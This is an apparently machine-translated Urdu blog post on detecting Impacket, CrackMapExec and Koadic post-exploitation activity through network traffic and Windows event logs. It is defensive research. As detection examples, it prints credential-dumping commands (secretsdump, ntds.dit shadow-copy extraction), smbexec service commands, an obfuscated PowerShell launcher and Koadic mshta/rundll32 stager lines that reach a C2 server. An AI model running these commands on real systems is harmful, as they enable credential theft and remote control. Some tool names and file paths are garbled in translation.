پرو ہوسٹر > بلاگ > انتظامیہ > ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش

کارپوریٹ سیکٹر میں حملوں کی تعداد ہر سال بڑھ رہی ہے: مثال کے طور پر 2017 میں 13 فیصد زیادہ منفرد واقعات ریکارڈ کیے گئے۔ 2016 کے مقابلے میں، اور 2018 کے آخر میں - 27 فیصد زیادہ واقعاتگزشتہ مدت کے مقابلے میں. ان میں بھی شامل ہے جہاں مرکزی کام کرنے والا ٹول ونڈوز آپریٹنگ سسٹم ہے۔ 2017-2018 میں، اے پی ٹی ڈریگن فلائی، اے پی ٹی 28، اے پی ٹی مڈی واٹر یورپ، شمالی امریکہ اور سعودی عرب میں حکومتی اور عسکری تنظیموں پر حملے کئے۔ اور ہم نے اس کے لیے تین ٹولز استعمال کیے - امپیکٹ, کریک میپیکسیک и کواڈک. ان کا سورس کوڈ کھلا ہے اور GitHub پر دستیاب ہے۔

یہ بات قابل غور ہے کہ یہ ٹولز ابتدائی دخول کے لیے نہیں بلکہ انفراسٹرکچر کے اندر حملہ کرنے کے لیے استعمال کیے جاتے ہیں۔ حملہ آور ان کا استعمال حملے کے مختلف مراحل میں دائرہ میں داخل ہونے کے بعد کرتے ہیں۔ ویسے، اس کا پتہ لگانا مشکل ہے اور اکثر صرف ٹیکنالوجی کی مدد سے نیٹ ورک ٹریفک میں سمجھوتہ کے نشانات کی نشاندہی کرنا یا ٹولز جو اجازت دیتے ہیں۔ انفراسٹرکچر میں داخل ہونے کے بعد حملہ آور کی فعال کارروائیوں کا پتہ لگانا. یہ ٹولز فائلوں کی منتقلی سے لے کر رجسٹری کے ساتھ بات چیت کرنے اور ریموٹ مشین پر کمانڈز کو انجام دینے تک مختلف قسم کے کام فراہم کرتے ہیں۔ ہم نے ان ٹولز کے نیٹ ورک کی سرگرمی کا تعین کرنے کے لیے ان کا مطالعہ کیا۔

ہمیں کیا کرنے کی ضرورت ہے:

  • سمجھیں کہ ہیکنگ ٹولز کیسے کام کرتے ہیں۔. معلوم کریں کہ حملہ آوروں کو کیا فائدہ اٹھانے کی ضرورت ہے اور وہ کون سی ٹیکنالوجی استعمال کر سکتے ہیں۔
  • حملے کے پہلے مرحلے میں انفارمیشن سیکیورٹی ٹولز کے ذریعے کیا پتہ نہیں چل سکا ہے۔. جاسوسی کے مرحلے کو چھوڑا جا سکتا ہے، یا تو اس وجہ سے کہ حملہ آور ایک اندرونی حملہ آور ہے، یا اس وجہ سے کہ حملہ آور انفراسٹرکچر میں ایک سوراخ کا استحصال کر رہا ہے جو پہلے معلوم نہیں تھا۔ اس کے اعمال کے پورے سلسلے کو بحال کرنا ممکن ہو جاتا ہے، اس وجہ سے مزید تحریک کا پتہ لگانے کی خواہش.
  • مداخلت کا پتہ لگانے والے ٹولز سے غلط مثبت کو ختم کریں۔. ہمیں یہ نہیں بھولنا چاہیے کہ جب صرف جاسوسی کی بنیاد پر بعض اعمال کا پتہ چل جاتا ہے تو بار بار غلطیاں ہو سکتی ہیں۔ عام طور پر بنیادی ڈھانچے میں کوئی بھی معلومات حاصل کرنے کے لیے کافی تعداد میں طریقے ہوتے ہیں، جو پہلی نظر میں جائز سے الگ نہیں کیے جا سکتے۔

یہ اوزار حملہ آوروں کو کیا دیتے ہیں؟ اگر یہ Impacket ہے، تو حملہ آوروں کو ماڈیولز کی ایک بڑی لائبریری ملتی ہے جسے حملے کے مختلف مراحل میں استعمال کیا جا سکتا ہے جو کہ فریم کو توڑنے کے بعد آتے ہیں۔ بہت سے ٹولز امپیکٹ ماڈیولز کو اندرونی طور پر استعمال کرتے ہیں - مثال کے طور پر، Metasploit۔ اس میں ریموٹ کمانڈ پر عمل درآمد کے لیے dcomexec اور wmiexec ہے، Impacket سے شامل کیے گئے میموری سے اکاؤنٹس حاصل کرنے کے لیے secretsdump۔ نتیجے کے طور پر، ایسی لائبریری کی سرگرمی کا درست پتہ لگانے سے مشتقات کی کھوج کو یقینی بنایا جائے گا۔

یہ کوئی اتفاق نہیں ہے کہ تخلیق کاروں نے CrackMapExec (یا صرف CME) کے بارے میں "Powered by Impacket" لکھا ہے۔ اس کے علاوہ، CME میں مقبول منظرناموں کے لیے تیار کردہ فعالیت ہے: پاس ورڈز یا ان کی ہیشز حاصل کرنے کے لیے Mimikatz، ریموٹ ایگزیکیوشن کے لیے میٹرپریٹر یا ایمپائر ایجنٹ کا نفاذ، اور بورڈ پر بلڈ ہاؤنڈ۔

تیسرا ٹول جس کا ہم نے انتخاب کیا وہ Koadic تھا۔ یہ بالکل حالیہ ہے، اسے 25 میں بین الاقوامی ہیکر کانفرنس DEFCON 2017 میں پیش کیا گیا تھا اور اسے ایک غیر معیاری نقطہ نظر سے ممتاز کیا گیا ہے: یہ HTTP، Java Script اور Microsoft Visual Basic Script (VBS) کے ذریعے کام کرتا ہے۔ اس نقطہ نظر کو زمین سے دور رہنے کا نام دیا جاتا ہے: یہ آلہ ونڈوز میں بنی ہوئی انحصار اور لائبریریوں کا ایک سیٹ استعمال کرتا ہے۔ تخلیق کار اسے COM کمانڈ اینڈ کنٹرول یا C3 کہتے ہیں۔

IMPACKET

امپیکٹ کی فعالیت بہت وسیع ہے، جس میں AD کے اندر جاسوسی سے لے کر داخلی MS SQL سرورز سے ڈیٹا اکٹھا کرنا، اسناد حاصل کرنے کی تکنیک تک شامل ہے: یہ ایک SMB ریلے حملہ ہے، اور ntds.dit فائل کو حاصل کرنا جس میں ایک ڈومین کنٹرولر سے صارف کے پاس ورڈز کی ہیش شامل ہیں۔ امپیکٹ چار مختلف طریقوں کا استعمال کرتے ہوئے دور سے کمانڈز کو بھی چلاتا ہے: WMI، ونڈوز شیڈیولر مینجمنٹ سروس، DCOM، اور SMB، اور ایسا کرنے کے لیے اسناد کی ضرورت ہوتی ہے۔

سیکرٹ ڈمپ

آئیے secretsdump پر ایک نظر ڈالتے ہیں۔ یہ ایک ماڈیول ہے جو صارف کی مشینوں اور ڈومین کنٹرولرز دونوں کو نشانہ بنا سکتا ہے۔ اسے میموری کے علاقوں LSA, SAM, SECURITY, NTDS.dit کی کاپیاں حاصل کرنے کے لیے استعمال کیا جا سکتا ہے، اس لیے اسے حملے کے مختلف مراحل میں دیکھا جا سکتا ہے۔ ماڈیول کے آپریشن کا پہلا مرحلہ ایس ایم بی کے ذریعے توثیق ہے، جس میں پاس دی ہیش اٹیک کو خود بخود انجام دینے کے لیے صارف کے پاس ورڈ یا اس کے ہیش کی ضرورت ہوتی ہے۔ اس کے بعد سروس کنٹرول مینیجر (SCM) تک رسائی کھولنے اور winreg پروٹوکول کے ذریعے رجسٹری تک رسائی حاصل کرنے کی درخواست آتی ہے، جس کا استعمال کرتے ہوئے حملہ آور دلچسپی کی شاخوں کا ڈیٹا تلاش کر سکتا ہے اور SMB کے ذریعے نتائج حاصل کر سکتا ہے۔

تصویر میں 1 ہم دیکھتے ہیں کہ ون ریگ پروٹوکول کا استعمال کرتے وقت، LSA کے ساتھ رجسٹری کلید کا استعمال کرتے ہوئے رسائی کیسے حاصل کی جاتی ہے۔ ایسا کرنے کے لیے، DCERPC کمانڈ کو opcode 15 - OpenKey کے ساتھ استعمال کریں۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 1. winreg پروٹوکول کا استعمال کرتے ہوئے رجسٹری کلید کھولنا

اس کے بعد، جب کلید تک رسائی حاصل کی جاتی ہے، تو اقدار کو محفوظ کیا جاتا ہے SaveKey کمانڈ کے ساتھ opcode 20۔ Impacket یہ ایک خاص طریقے سے کرتا ہے۔ یہ اقدار کو ایک فائل میں محفوظ کرتا ہے جس کا نام .tmp کے ساتھ منسلک 8 بے ترتیب حروف کی ایک تار ہے۔ اس کے علاوہ، اس فائل کا مزید اپ لوڈ SMB کے ذریعے System32 ڈائریکٹری (تصویر 2) سے ہوتا ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 2. ریموٹ مشین سے رجسٹری کی کلید حاصل کرنے کی اسکیم

یہ پتہ چلتا ہے کہ نیٹ ورک پر اس طرح کی سرگرمی کو winreg پروٹوکول، مخصوص ناموں، کمانڈز اور ان کے آرڈر کا استعمال کرتے ہوئے کچھ رجسٹری برانچوں کے سوالات کے ذریعے پتہ لگایا جا سکتا ہے۔

یہ ماڈیول ونڈوز ایونٹ لاگ میں نشانات بھی چھوڑ دیتا ہے، جس سے اس کا پتہ لگانا آسان ہو جاتا ہے۔ مثال کے طور پر، کمانڈ پر عمل درآمد کے نتیجے میں

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

ونڈوز سرور 2016 لاگ میں ہم واقعات کی درج ذیل کلیدی ترتیب دیکھیں گے۔

1. 4624 - ریموٹ لاگ ان۔
2. 5145 - winreg ریموٹ سروس تک رسائی کے حقوق کی جانچ کرنا۔
3. 5145 - System32 ڈائرکٹری میں فائل تک رسائی کے حقوق کی جانچ کرنا۔ فائل کا اوپر ذکر کردہ بے ترتیب نام ہے۔
4. 4688 - ایک cmd.exe عمل بنانا جو vssadmin شروع کرتا ہے:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - کمانڈ کے ساتھ ایک عمل بنانا:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - کمانڈ کے ساتھ ایک عمل بنانا:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - کمانڈ کے ساتھ ایک عمل بنانا:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

بہت سے پوسٹ ایکسپلائیٹیشن ٹولز کی طرح، امپیکیٹ میں کمانڈز کو دور سے چلانے کے لیے ماڈیولز ہیں۔ ہم smbexec پر توجہ مرکوز کریں گے، جو ریموٹ مشین پر ایک انٹرایکٹو کمانڈ شیل فراہم کرتا ہے۔ اس ماڈیول کو ایس ایم بی کے ذریعے توثیق کی بھی ضرورت ہوتی ہے، یا تو پاس ورڈ یا پاس ورڈ ہیش کے ساتھ۔ تصویر میں شکل 3 میں ہم ایک مثال دیکھتے ہیں کہ اس طرح کا ٹول کیسے کام کرتا ہے، اس صورت میں یہ مقامی ایڈمنسٹریٹر کنسول ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 3. انٹرایکٹو smbexec کنسول

تصدیق کے بعد smbexec کا پہلا مرحلہ SCM کو OpenSCManagerW کمانڈ (15) کے ساتھ کھولنا ہے۔ سوال قابل ذکر ہے: MachineName فیلڈ DUMMY ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 4. سروس کنٹرول مینیجر کو کھولنے کی درخواست کریں۔

اگلا، سروس CreateServiceW کمانڈ (12) کا استعمال کرتے ہوئے بنائی گئی ہے۔ smbexec کے معاملے میں، ہم ہر بار ایک ہی کمانڈ کی تعمیراتی منطق دیکھ سکتے ہیں۔ تصویر میں 5 سبز غیر تبدیل شدہ کمانڈ پیرامیٹرز کی نشاندہی کرتا ہے، پیلا اشارہ کرتا ہے کہ حملہ آور کیا تبدیل کر سکتا ہے۔ یہ دیکھنا آسان ہے کہ قابل عمل فائل کا نام، اس کی ڈائرکٹری اور آؤٹ پٹ فائل کو تبدیل کیا جا سکتا ہے، لیکن Impacket ماڈیول کی منطق کو پریشان کیے بغیر باقی کو تبدیل کرنا بہت مشکل ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 5. سروس کنٹرول مینیجر کا استعمال کرتے ہوئے سروس بنانے کی درخواست کریں۔

Smbexec ونڈوز ایونٹ لاگ میں بھی واضح نشانات چھوڑ دیتا ہے۔ ipconfig کمانڈ کے ساتھ انٹرایکٹو کمانڈ شیل کے لیے Windows Server 2016 لاگ میں، ہم واقعات کی درج ذیل کلیدی ترتیب دیکھیں گے۔

1. 4697 - متاثرہ کی مشین پر سروس کی تنصیب:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - نقطہ 1 سے دلائل کے ساتھ cmd.exe عمل کی تخلیق۔
3. 5145 - C$ ڈائرکٹری میں __output فائل تک رسائی کے حقوق کی جانچ کرنا۔
4. 4697 - متاثرہ کی مشین پر سروس کی تنصیب۔

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - نقطہ 4 سے دلائل کے ساتھ cmd.exe عمل کی تخلیق۔
6. 5145 - C$ ڈائرکٹری میں __output فائل تک رسائی کے حقوق کی جانچ کرنا۔

امپیکٹ حملے کے اوزار کی ترقی کی بنیاد ہے۔ یہ ونڈوز کے بنیادی ڈھانچے میں تقریباً تمام پروٹوکول کو سپورٹ کرتا ہے اور ساتھ ہی اس کی اپنی مخصوص خصوصیات ہیں۔ یہاں مخصوص winreg درخواستیں ہیں، اور خصوصیت کی کمانڈ کی تشکیل کے ساتھ SCM API کا استعمال، اور فائل کے نام کی شکل، اور SMB شیئر SYSTEM32۔

CRACKMAPEXEC

CME ٹول بنیادی طور پر ان معمول کی کارروائیوں کو خودکار بنانے کے لیے ڈیزائن کیا گیا ہے جو حملہ آور کو نیٹ ورک کے اندر آگے بڑھنے کے لیے انجام دینے ہوتے ہیں۔ یہ آپ کو معروف ایمپائر ایجنٹ اور میٹرپریٹر کے ساتھ مل کر کام کرنے کی اجازت دیتا ہے۔ خفیہ طور پر کمانڈز کو انجام دینے کے لیے، CME انہیں مبہم کر سکتا ہے۔ بلڈ ہاؤنڈ (ایک الگ جاسوسی ٹول) کا استعمال کرتے ہوئے، حملہ آور ایک فعال ڈومین ایڈمنسٹریٹر سیشن کی تلاش کو خودکار کر سکتا ہے۔

خونی ہاؤس

بلڈ ہاؤنڈ، ایک اسٹینڈ لون ٹول کے طور پر، نیٹ ورک کے اندر جدید جاسوسی کی اجازت دیتا ہے۔ یہ صارفین، مشینوں، گروپس، سیشنز کے بارے میں ڈیٹا اکٹھا کرتا ہے اور اسے پاور شیل اسکرپٹ یا بائنری فائل کے طور پر فراہم کیا جاتا ہے۔ LDAP یا SMB پر مبنی پروٹوکول معلومات جمع کرنے کے لیے استعمال کیے جاتے ہیں۔ CME انٹیگریشن ماڈیول بلڈ ہاؤنڈ کو متاثرہ کی مشین پر ڈاؤن لوڈ کرنے، عمل درآمد کے بعد جمع کردہ ڈیٹا کو چلانے اور وصول کرنے کی اجازت دیتا ہے، اس طرح سسٹم میں خودکار کارروائیاں ہوتی ہیں اور انہیں کم قابل توجہ بناتا ہے۔ بلڈ ہاؤنڈ گرافیکل شیل جمع کردہ ڈیٹا کو گراف کی شکل میں پیش کرتا ہے، جو آپ کو حملہ آور کی مشین سے ڈومین ایڈمنسٹریٹر تک کا مختصر ترین راستہ تلاش کرنے کی اجازت دیتا ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 6. بلڈ ہاؤنڈ انٹرفیس

شکار کی مشین پر چلانے کے لیے، ماڈیول ATSVC اور SMB کا استعمال کرتے ہوئے ایک کام تخلیق کرتا ہے۔ ATSVC ونڈوز ٹاسک شیڈیولر کے ساتھ کام کرنے کا ایک انٹرفیس ہے۔ CME نیٹ ورک پر کام تخلیق کرنے کے لیے اپنے NetrJobAdd(1) فنکشن کا استعمال کرتا ہے۔ سی ایم ای ماڈیول کیا بھیجتا ہے اس کی ایک مثال تصویر میں دکھائی گئی ہے۔ 7: یہ ایک cmd.exe کمانڈ کال ہے اور XML فارمیٹ میں دلائل کی شکل میں مبہم کوڈ ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
تصویر 7۔ CME کے ذریعے ٹاسک بنانا

عمل درآمد کے لیے ٹاسک جمع کروانے کے بعد، متاثرہ کی مشین خود بلڈ ہاؤنڈ شروع کر دیتی ہے، اور یہ ٹریفک میں دیکھا جا سکتا ہے۔ معیاری گروپس، ڈومین میں موجود تمام مشینوں اور صارفین کی فہرست، اور SRVSVC NetSessEnum درخواست کے ذریعے فعال صارف سیشنز کے بارے میں معلومات حاصل کرنے کے لیے LDAP سوالات کے ذریعے ماڈیول کی خصوصیت ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 8. SMB کے ذریعے فعال سیشنز کی فہرست حاصل کرنا

اس کے علاوہ، متاثرہ کی مشین پر بلڈ ہاؤنڈ لانچ کرنے کے ساتھ آڈیٹنگ کی سہولت بھی آئی ڈی 4688 (پراسیس تخلیق) اور پراسیس کا نام کے ساتھ ایک ایونٹ کے ساتھ ہوتا ہے۔ «C:WindowsSystem32cmd.exe». اس کے بارے میں جو بات قابل ذکر ہے وہ کمانڈ لائن دلائل ہیں:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

enum_avproducts ماڈیول فعالیت اور نفاذ کے نقطہ نظر سے بہت دلچسپ ہے۔ WMI آپ کو مختلف ونڈوز آبجیکٹس سے ڈیٹا بازیافت کرنے کے لیے WQL استفسار کی زبان استعمال کرنے کی اجازت دیتا ہے، جو کہ بنیادی طور پر یہ CME ماڈیول استعمال کرتا ہے۔ یہ شکار کی مشین پر نصب حفاظتی ٹولز کے بارے میں AntiSpywareProduct اور AntiMirusProduct کلاسز کے لیے سوالات پیدا کرتا ہے۔ ضروری ڈیٹا حاصل کرنے کے لیے، ماڈیول rootSecurityCenter2 نام کی جگہ سے جڑتا ہے، پھر ایک WQL استفسار تیار کرتا ہے اور جواب وصول کرتا ہے۔ تصویر میں شکل 9 ایسی درخواستوں اور جوابات کے مندرجات کو ظاہر کرتا ہے۔ ہماری مثال میں، Windows Defender ملا۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 9. enum_avproducts ماڈیول کی نیٹ ورک سرگرمی

اکثر، WMI آڈیٹنگ (ٹریس WMI-Activity)، جس کے واقعات میں آپ WQL سوالات کے بارے میں مفید معلومات حاصل کر سکتے ہیں، غیر فعال ہو سکتی ہے۔ لیکن اگر یہ فعال ہے، پھر اگر enum_avproducts اسکرپٹ چلایا جاتا ہے، تو ID 11 کے ساتھ ایک ایونٹ محفوظ ہو جائے گا۔ اس میں اس صارف کا نام ہوگا جس نے درخواست بھیجی ہے اور نام rootSecurityCenter2 نام کی جگہ پر ہوگا۔

CME ماڈیولز میں سے ہر ایک کے اپنے نمونے ہوتے ہیں، خواہ وہ مخصوص WQL سوالات ہوں یا LDAP اور SMB میں مبہم اور بلڈ ہاؤنڈ کی مخصوص سرگرمی کے ساتھ ٹاسک شیڈیولر میں کسی خاص قسم کے ٹاسک کی تخلیق۔

کواڈک

کواڈک کی ایک مخصوص خصوصیت ونڈوز میں بنائے گئے جاوا اسکرپٹ اور VBScript ترجمانوں کا استعمال ہے۔ اس لحاظ سے، یہ زمین سے دور رہنے کے رجحان کی پیروی کرتا ہے - یعنی اس کا کوئی بیرونی انحصار نہیں ہے اور معیاری ونڈوز ٹولز استعمال کرتا ہے۔ یہ مکمل کمانڈ اینڈ کنٹرول (CnC) کے لیے ایک ٹول ہے، کیونکہ انفیکشن کے بعد مشین پر ایک "ایمپلانٹ" انسٹال ہوتا ہے، جس سے اسے کنٹرول کیا جا سکتا ہے۔ کواڈک اصطلاح میں ایسی مشین کو "زومبی" کہا جاتا ہے۔ اگر متاثرہ کی طرف سے مکمل آپریشن کے لیے ناکافی مراعات ہیں، تو Koadic کے پاس صارف اکاؤنٹ کنٹرول بائی پاس (UAC بائی پاس) تکنیک کا استعمال کرتے ہوئے انہیں بڑھانے کی صلاحیت ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 10. کواڈک شیل

متاثرہ کو کمانڈ اینڈ کنٹرول سرور کے ساتھ مواصلت شروع کرنی چاہیے۔ ایسا کرنے کے لیے، اسے پہلے سے تیار شدہ URI سے رابطہ کرنے کی ضرورت ہے اور اسٹیجرز میں سے ایک کا استعمال کرتے ہوئے مرکزی کواڈک باڈی حاصل کرنا ہوگی۔ تصویر میں شکل 11 mshta سٹیجر کے لیے ایک مثال دکھاتا ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 11. CnC سرور کے ساتھ سیشن شروع کرنا

جوابی متغیر WS کی بنیاد پر، یہ واضح ہو جاتا ہے کہ عمل درآمد WScript.Shell کے ذریعے ہوتا ہے، اور متغیرات STAGER، SESSIONKEY، JOBKEY، JOBKEYPATH، EXPIRE موجودہ سیشن کے پیرامیٹرز کے بارے میں اہم معلومات پر مشتمل ہیں۔ یہ ایک CnC سرور کے ساتھ HTTP کنکشن میں پہلی درخواست کے جواب کا جوڑا ہے۔ اس کے بعد کی درخواستوں کا براہ راست تعلق ماڈیولز (ایمپلانٹس) کی فعالیت سے ہے۔ تمام کواڈک ماڈیول صرف CnC کے ساتھ ایک فعال سیشن کے ساتھ کام کرتے ہیں۔

Mimikatz

جس طرح CME بلڈ ہاؤنڈ کے ساتھ کام کرتا ہے، اسی طرح Koadic Mimikatz کے ساتھ ایک الگ پروگرام کے طور پر کام کرتا ہے اور اسے لانچ کرنے کے متعدد طریقے ہیں۔ ذیل میں Mimikatz امپلانٹ ڈاؤن لوڈ کرنے کے لیے درخواست کے جواب کا جوڑا ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 12. Mimikatz کو Koadic میں منتقل کریں۔

آپ دیکھ سکتے ہیں کہ درخواست میں URI فارمیٹ کیسے تبدیل ہوا ہے۔ اب اس میں csrf متغیر کے لیے ایک قدر ہے، جو منتخب ماڈیول کے لیے ذمہ دار ہے۔ اُس کے نام پر توجہ نہ دینا۔ ہم سب جانتے ہیں کہ CSRF کو عام طور پر مختلف طریقے سے سمجھا جاتا ہے۔ جواب Koadic کی وہی مرکزی باڈی تھی، جس میں Mimikatz سے متعلق کوڈ شامل کیا گیا تھا۔ یہ کافی بڑا ہے، تو آئیے اہم نکات کو دیکھتے ہیں۔ یہاں ہمارے پاس Mimikatz لائبریری کو base64 میں انکوڈ کیا گیا ہے، ایک سیریلائزڈ .NET کلاس جو اسے انجیکشن کرے گی، اور Mimikatz کو لانچ کرنے کے لیے دلائل۔ عملدرآمد کا نتیجہ نیٹ ورک پر واضح متن میں منتقل کیا جاتا ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 13. ریموٹ مشین پر Mimikatz چلانے کا نتیجہ

Exec_cmd

کواڈک کے پاس ایسے ماڈیولز بھی ہیں جو کمانڈز کو دور سے چلا سکتے ہیں۔ یہاں ہم وہی URI جنریشن کا طریقہ اور واقف sid اور csrf متغیرات دیکھیں گے۔ exec_cmd ماڈیول کی صورت میں، کوڈ کو باڈی میں شامل کیا جاتا ہے جو شیل کمانڈز پر عمل درآمد کرنے کی صلاحیت رکھتا ہے۔ ذیل میں ایسا کوڈ دکھایا گیا ہے جو CnC سرور کے HTTP جواب میں موجود ہے۔

ونڈوز انفراسٹرکچر پر حملوں کا پتہ لگانے کا طریقہ: ہیکر ٹولز کی تلاش
چاول۔ 14. امپلانٹ کوڈ exec_cmd

واقف WS وصف کے ساتھ GAWTUUGCFI متغیر کوڈ کے نفاذ کے لیے درکار ہے۔ اس کی مدد سے، امپلانٹ شیل کو کال کرتا ہے، کوڈ کی دو شاخوں پر کارروائی کرتا ہے - shell.exec آؤٹ پٹ ڈیٹا سٹریم اور shell.run کی واپسی کے بغیر واپسی کے۔

Koadic ایک عام ٹول نہیں ہے، لیکن اس کے اپنے نمونے ہیں جن کے ذریعے اسے جائز ٹریفک میں پایا جا سکتا ہے:

  • HTTP درخواستوں کی خصوصی تشکیل،
  • winHttpRequests API کا استعمال کرتے ہوئے،
  • ActiveXObject کے ذریعے WScript.Shell آبجیکٹ بنانا،
  • بڑے قابل عمل جسم.

ابتدائی کنکشن سٹیجر کے ذریعے شروع کیا جاتا ہے، اس لیے ونڈوز ایونٹس کے ذریعے اس کی سرگرمی کا پتہ لگانا ممکن ہے۔ mshta کے لیے، یہ واقعہ 4688 ہے، جو آغاز کی صفت کے ساتھ ایک عمل کی تخلیق کی نشاندہی کرتا ہے:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

جب Koadic چل رہا ہے، تو آپ دیگر 4688 واقعات کو ان صفات کے ساتھ دیکھ سکتے ہیں جو بالکل اس کی خصوصیت رکھتے ہیں:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

نتائج

زمین سے دور رہنے کا رجحان مجرموں میں مقبول ہو رہا ہے۔ وہ اپنی ضروریات کے لیے ونڈوز میں بنائے گئے ٹولز اور میکانزم کا استعمال کرتے ہیں۔ ہم APT رپورٹس میں اس اصول کی پیروی کرتے ہوئے مقبول ٹولز Koadic، CrackMapExec اور Impacket دیکھ رہے ہیں۔ ان ٹولز کے لیے GitHub پر فورکس کی تعداد بھی بڑھ رہی ہے، اور نئے نمودار ہو رہے ہیں (اب ان میں سے ایک ہزار کے قریب موجود ہیں)۔ یہ رجحان اپنی سادگی کی وجہ سے مقبولیت حاصل کر رہا ہے: حملہ آوروں کو فریق ثالث کے اوزار کی ضرورت نہیں ہوتی؛ وہ پہلے ہی متاثرین کی مشینوں پر ہوتے ہیں اور حفاظتی اقدامات کو نظرانداز کرنے میں ان کی مدد کرتے ہیں۔ ہم نیٹ ورک کمیونیکیشن کے مطالعہ پر توجہ مرکوز کرتے ہیں: اوپر بیان کردہ ہر ٹول نیٹ ورک ٹریفک میں اپنے نشانات چھوڑتا ہے۔ ان کے تفصیلی مطالعہ نے ہمیں اپنی مصنوعات کو سکھانے کی اجازت دی۔ پی ٹی نیٹ ورک اٹیک ڈسکوری ان کا پتہ لگانا، جو بالآخر ان میں شامل سائبر واقعات کے پورے سلسلے کی چھان بین کرنے میں مدد کرتا ہے۔

مصنفین:

  • اینٹون ٹیورین، ماہر خدمات کے شعبے کے سربراہ، پی ٹی ایکسپرٹ سیکیورٹی سینٹر، مثبت ٹیکنالوجیز
  • ایگور پوڈموکوف، ماہر، پی ٹی ایکسپرٹ سیکیورٹی سینٹر، مثبت ٹیکنالوجیز

ماخذ: www.habr.com

نیا تبصرہ شامل کریں